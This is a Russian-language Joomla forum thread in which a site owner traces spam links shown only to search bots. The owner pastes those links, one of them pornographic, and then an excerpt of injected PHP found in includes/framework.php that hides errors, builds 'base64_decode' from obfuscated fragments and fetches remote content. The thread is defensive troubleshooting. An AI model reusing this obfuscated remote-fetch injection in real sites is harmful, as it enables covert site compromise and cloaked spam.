Форум русской поддержки Joomla!® CMS
05.12.2016, 08:33:20 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Левые ссылки в кеше поисковых систем

 (Прочитано 129 раз)
0 Пользователей и 1 Гость смотрят эту тему.
nelgondar
Новичок
*

Репутация: +1/-0
Offline Offline

Сообщений: 7


« : 09.11.2016, 00:59:53 »

Здравствуйте.
Обнаружил в кеше поисковиков на своем сайте всякую гадость. Сменил UserAgent, прикинулся гуглботом и увидел кучу всяких ссылок среди контента. Выглядит это примерно так
Код:
<div>
               

<div class="custom">
<p>
<a href="http://pk-stimul.ru/problemi-folksvagen-tiguan.html">проблемы фольксваген тигуан</a>

  </p></div>
<a href="http://elizavetacentr.ru/z-otchet-merkuriy-115k.html">http://elizavetacentr.ru/z-otchet-merkuriy-115k.html</a> z отчет меркурий 115к <a href="http://digidocumenttalsound.ru/stihi-bloka-korotkie.html">http://digidocumenttalsound.ru/stihi-bloka-korotkie.html</a> стихи блока короткие 
<a href="http://rucheek-td.ru/opisanie-prirodi-na-angliyskom-yazike.html">описание природы на английском языке</a> <a href="http://grandrise.ru/vyazanie-noskov-na-dvuh-spitsah-poshagovaya-instruktsiya.html">вязание носков на двух спицах пошаговая инструкция</a> 
<a href="http://ledokolfest.ru/fancybox/303.html">белки свойства белков</a> <a href="http://cifrovoi24.ru/catalog/sitemap11.html">образец печать отк</a> 
<a href="http://mostrans24.ru/opisanie-professiy-na-angliyskom.html">http://mostrans24.ru/opisanie-professiy-na-angliyskom.html</a> описание профессий на английском <a href="http://mixtransgroup.ru/samsung-dsb-b270v-proshivka.html">http://mixtransgroup.ru/samsung-dsb-b270v-proshivka.html</a> samsung dsb b270v прошивка 
<a href="http://minitenzor.ru/15796-body-lotion-perevod-sposob-primeneniya.html">http://minitenzor.ru/15796-body-lotion-perevod-sposob-primeneniya.html</a> body lotion перевод способ применения <a href="http://gnet.su/img/radiorinok-rostov-na-donu-adres.html">радиорынок ростов на дону адрес</a> 
<a href="http://medbluebook.ru/catalog/220.html">http://medbluebook.ru/catalog/220.html</a> fallout 3 секреты и пасхалки <a href="http://pk-stimul.ru/pravila-bezopasnosti-pri-ekspluatatsii-elektroustanovok-potrebiteley.html">правила безопасности при эксплуатации электроустановок потребителей</a> 
<a href="http://tmscom.ru/smotret-gigporno-roliki.html">смотреть гигпорно ролики</a> <a href="http://jobondocumentline.ru/razrabotki-pedagogicheskih-sovetov-v-dou.html">разработки педагогических советов в доу</a> 
<a href="http://gou1627.ru/firmenniy-blank-obrazets-predpriyatiya.html">фирменный бланк образец предприятия</a> <a href="http://kite-dongfeng.ru/12151.html">http://kite-dongfeng.ru/12151.html</a> профессиональные навыки водителя в резюме 
<a href="http://mastersheet163.ru/drayvera-na-rul-m2-he2d.html">драйвера на руль m2 he2d</a> <a href="http://oil-factor.ru/amigurumi-porosenok-shema.html">амигуруми поросенок схема</a> 
<a href="http://evagrand.ru/7847-instruktsiya-po-ekspluatatsiya-folksvagen-dzhetta.html">http://evagrand.ru/7847-instruktsiya-po-ekspluatatsiya-folksvagen-dzhetta.html</a> инструкция по эксплуатация фольксваген джетта <a href="http://loto-plus.ru/pozitivnie-korotkie-statusi.html">http://loto-plus.ru/pozitivnie-korotkie-statusi.html</a> позитивные короткие статусы 
<a href="http://plitka-kd.ru/pen-pad-driver-with-macro-key-manager.html">http://plitka-kd.ru/pen-pad-driver-with-macro-key-manager.html</a> pen pad driver with macro key manager <a href="http://snurdom.ru/pozdravleniya-na-farforovuyu-svadbu.html">http://snurdom.ru/pozdravleniya-na-farforovuyu-svadbu.html</a> поздравления на фарфоровую свадьбу 
<a href="http://prodslr.ru/i/noviy-zakon-o-vkladah.html">http://prodslr.ru/i/noviy-zakon-o-vkladah.html</a> новый закон о вкладах <a href="http://studio-vivat.ru/evroprotokol-pri-dtp-2015-obrazets.html">http://studio-vivat.ru/evroprotokol-pri-dtp-2015-obrazets.html</a> европротокол при дтп 2015 образец 
<a href="http://bebig-isotopen.ru/statement/plita-elektricheskaya-ariston-instruktsiya.html">http://bebig-isotopen.ru/statement/plita-elektricheskaya-ariston-instruktsiya.html</a> плита электрическая аристон инструкция <a href="http://funjikdys3t.ru/gematoma-posle-inektsii-lechenie.html">гематома после инъекции лечение</a> 
</div>

Есть ли у вас идеи, как можно найти корень зла, grep-ал пол вечера файлы сайта, результатов не дало.
Записан
dmitry_stas
Профи
********

Репутация: +795/-4
Offline Offline

Сообщений: 7743



« Ответ #1 : 09.11.2016, 01:03:29 »

шаблон скачан непонятно откуда?
Записан
nelgondar
Новичок
*

Репутация: +1/-0
Offline Offline

Сообщений: 7


« Ответ #2 : 09.11.2016, 10:31:16 »

Увы, да.
Записан
dmitry_stas
Профи
********

Репутация: +795/-4
Offline Offline

Сообщений: 7743



« Ответ #3 : 09.11.2016, 10:36:49 »

увы, результат вполне ожидаем. когда придет понимание? никогда? Azn
Записан
nelgondar
Новичок
*

Репутация: +1/-0
Offline Offline

Сообщений: 7


« Ответ #4 : 09.11.2016, 11:10:08 »

Понимание пришло уже давно, но  сейчас нужно что-то экстренно сделать
Записан
dmitry_stas
Профи
********

Репутация: +795/-4
Offline Offline

Сообщений: 7743



« Ответ #5 : 09.11.2016, 11:27:54 »

ну так вы ж сами сказали - шаблон
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #6 : 09.11.2016, 11:32:10 »

ну так вы ж сами сказали - шаблон

Да может и в модулях сидеть/плагинах, да где угодно.
Может там квик установлен изначально.
Записан
dmitry_stas
Профи
********

Репутация: +795/-4
Offline Offline

Сообщений: 7743



« Ответ #7 : 09.11.2016, 11:37:49 »

а, ну да, точно. если был квикстарт - то там вообще не понятно теперь что где.
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #8 : 09.11.2016, 11:48:09 »

Очень смахивает на ***код одного из .....

Попробуйте каждый модуль посмотреть в папке tmpl/default.php код аля:

<?php
определённый вид кода с ссылкой на www.***сайт.ru/3.txt
?>

На той стороне сайта в 3.txt скрипт стоит-встречал такое и не раз.
Он и формирует ваши ссылки, самих ссылок нет у вас.

Или по ссылкам прогоните хотя бы-вон мой компонент на внешние ссылки - может банальное найдёт.
Заодно посмотрите ещё всякое "извне".
http://joomlaforum.ru/index.php/topic,332446.msg1675315.html#msg1675315
Записан
nelgondar
Новичок
*

Репутация: +1/-0
Offline Offline

Сообщений: 7


« Ответ #9 : 09.11.2016, 13:34:59 »

Попробовал так
grep -R .txt ./ |grep default.php

в корне сайта,  ничего интересного
Код:
./administrator/templates/hathor/html/com_templates/template/default.php: <option value="txt">txt</option>
./administrator/components/com_joomlaupdate/models/default.php: $fp = @fopen($tempdir . '/test.txt', 'w');
./administrator/components/com_joomlaupdate/models/default.php: unlink($tempdir . '/test.txt');
./administrator/components/com_templates/views/template/tmpl/default.php: <option value="txt">txt</option>
./templates/beez3/html/com_content/archive/default.php: <legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>
Записан
voland
Профи
********

Репутация: +487/-86
Offline Offline

Пол: Мужской
Сообщений: 8704


любит наш народ всякое гавно...


« Ответ #10 : 09.11.2016, 14:48:14 »

Обсуждение вареза запрещено
Записан
nelgondar
Новичок
*

Репутация: +1/-0
Offline Offline

Сообщений: 7


« Ответ #11 : 09.11.2016, 22:46:00 »

Всем спасибо. Включил мозг, пошел по цепочке вызова файлов и нашел в ./includes/framework.php
Код:
...
@ini_set('display_errors', '0');
error_reporting(0);
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5';
$pass = "Zgc5c4MXrLsoeBsF6pBRLebcM1fWdrpdmmSLH6uToRkH";
if (ini_get('allow_url_fopen')) {
    function get_data_ya($url) {
        $data = file_get_contents($url);
        return $data;
    }
}
else {
    function get_data_ya($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}
....
Записан
dmitry_stas
Профи
********

Репутация: +795/-4
Offline Offline

Сообщений: 7743



« Ответ #12 : 09.11.2016, 23:37:45 »

Обсуждение вареза запрещено
судя по последнему сообщению уже не варез обсуждаем, а взлом Azn
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet